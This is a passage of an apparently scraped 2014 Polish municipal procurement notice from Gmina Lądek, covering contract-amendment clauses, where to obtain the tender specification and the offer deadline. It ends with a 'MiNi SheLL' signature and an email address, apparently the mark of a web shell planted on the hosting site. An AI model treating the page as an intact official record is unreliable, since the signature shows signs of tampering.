i)odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych oraz odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, a w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych,
j)zmiany w trakcie wykonywania umowy przepisów, norm lub normatywów mających zastosowanie do przedmiotu umowy lub wprowadzenia tych zmian dokona Zamawiający .
k)zmiany wynagrodzenia w sytuacjach określonych w § 5 ust. 4 projektu umowy,
 j)Zmiany podwykonawcy na pisemny wniosek Wykonawcy lub rezygnację z udziału 
     podwykonawcy .Zmiana może nastąpić wyłącznie po przedstawieniu przez Wykonawcę oświadczenia podwykonawcy o rezygnacji z udziału w realizacji przedmiotu umowy i braku roszczeń wobec Wykonawcy z tytułu realizacji robót.
2.Każda ze stron powołując się na okoliczności, o których mowa w ust.2 pkt 2) zobowiązana jest informować drugą stronę o zaistniałym fakcie w terminie 7 dni od dnia jego zaistnienia.
3.Nie stanowią zmiany umowy i nie wymagają aneksu zmiany związane z obsługą administracyjno- organizacyjną umowy / np. zmiana rachunku bankowego lub zmiana danych adresowych, zmiana inspektora nadzoru / , które wymagają pisemnego zgłoszenia drugiej stronie.
Wszystkie  powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią  jednocześnie zobowiązania do wyrażenia takiej zgody</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.gmina-ladek.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Lądku, pok. nr 7 , ul. Rynek 26, 62-406 Lądek.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.09.2014 godzina 15:00, miejsce: Urząd Gminy Lądek, pok. nr 8 - Sekretariat,62-406 Lądek, ul. Rynek 26.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com